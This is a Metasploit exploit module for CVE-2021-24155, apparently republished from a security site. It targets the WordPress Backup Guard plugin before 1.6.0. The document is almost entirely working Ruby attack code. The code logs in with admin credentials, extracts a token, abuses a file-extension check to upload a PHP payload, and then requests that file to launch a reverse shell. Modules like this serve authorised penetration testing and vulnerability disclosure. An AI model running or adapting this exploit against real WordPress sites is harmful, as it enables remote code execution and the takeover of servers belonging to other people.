Authored by Ron Jost, Nguyen Van Khanh | Site metasploit.com

This Metasploit module allows an attacker with a privileged WordPress account to launch a reverse shell due to an arbitrary file upload vulnerability in WordPress plugin Backup Guard versions prior to 1.6.0. This is due to an incorrect check of the uploaded file extension which should be of SGBP type. Then, the uploaded payload can be triggered by a call to /wp-content/uploads/backup-guard/.php.

advisories | CVE-2021-24155

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wordpress Plugin Backup Guard - Authenticated Remote Code Execution',
        'Description' => %q{
          This module allows an attacker with a privileged WordPress account to launch a reverse shell
          due to an arbitrary file upload vulnerability in WordPress plugin Backup Guard < 1.6.0.
          This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
          Then, the uploaded payload can be triggered by a call to `/wp-content/uploads/backup-guard/<random_payload_name>.php`
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Nguyen Van Khanh', # Original PoC, discovery
            'Ron Jost', # Exploit-db
            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
          ],
        'References' =>
          [
            ['EDB', '50093'],
            ['CVE', '2021-24155'],
            ['CWE', '434'],
            ['WPVDB', 'd442acac-4394-45e4-b6bb-adf4a40960fb'],
            ['URL', 'https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2473510%40backup&old=2472212%40backup&sfp_email=&sfph_mail=']
          ],
        'Platform' => [ 'php' ],
        'Arch' => ARCH_PHP,
        'Targets' =>
        [
          [ 'Wordpress Backup Guard < 1.6.0', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2021-05-04',
        'Notes' =>
          {
            'Stability' => [ CRASH_SAFE ],
            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
            'Reliability' => [ REPEATABLE_SESSION ]
          }
      )
    )

    register_options [
      OptString.new('USERNAME', [true, 'Username of the admin account', 'admin']),
      OptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']),
      OptString.new('TARGETURI', [true, 'The base path of the WordPress server', '/'])
    ]
  end

  def check
    return CheckCode::Unknown('Server not online or not detected as wordpress') unless wordpress_and_online?

    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
    return CheckCode::Detected('Authentication to WordPress failed.') unless cookie

    check_plugin_version_from_readme('backup', '1.6.0')
  end

  def get_token(cookie)
    r = send_request_cgi({
      'method' => 'GET',
      'cookie' => cookie,
      'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),
      'Referer' => full_uri('/wp-admin/users.php'),
      'vars_get' => {
        'page' => 'backup_guard_backups'
      }
    })
    fail_with(Failure::Unknown, "Target #{RHOST} could not be reached.") unless r
    res = r.body.to_s.match(/&token=(h+)/)
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve the token.') unless res
    res[1]
  end

  def exploit
    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
    fail_with(Failure::UnexpectedReply, 'Authentication failed') unless cookie
    token = get_token(cookie)
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve the Backup Guard token') unless token
    payload_name = "#{Rex::Text.rand_text_alpha_lower(5)}.php"

    post_data = Rex::MIME::Message.new
    post_data.add_part(payload.encoded, 'text/php', nil, "form-data; name='files[]'; filename=#{payload_name}")

    print_status("Uploading file '#{payload_name}' containing the payload...")

    r = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/wp-admin/admin-ajax.php'),
      'headers' => {
        'Origin' => full_uri(''),
        'Referer' => full_uri('/wp-admin/admin.php?page=backup_guard_backups'),
        'X-Requested-With' => 'XMLHttpRequest'
      },
      'vars_get' =>
      {
        'action' => 'backup_guard_importBackup',
        'token' => token
      },
      'cookie' => cookie,
      'data' => post_data.to_s,
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
    )

    fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file") unless r&.code == 200
    register_files_for_cleanup(payload_name.to_s)

    print_status('Triggering the payload ...')
    send_request_cgi(
      'method' => 'GET',
      'cookie' => cookie,
      'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/backup-guard/#{payload_name}")
    )
  end
end

RELATED ARTICLESMORE FROM AUTHOR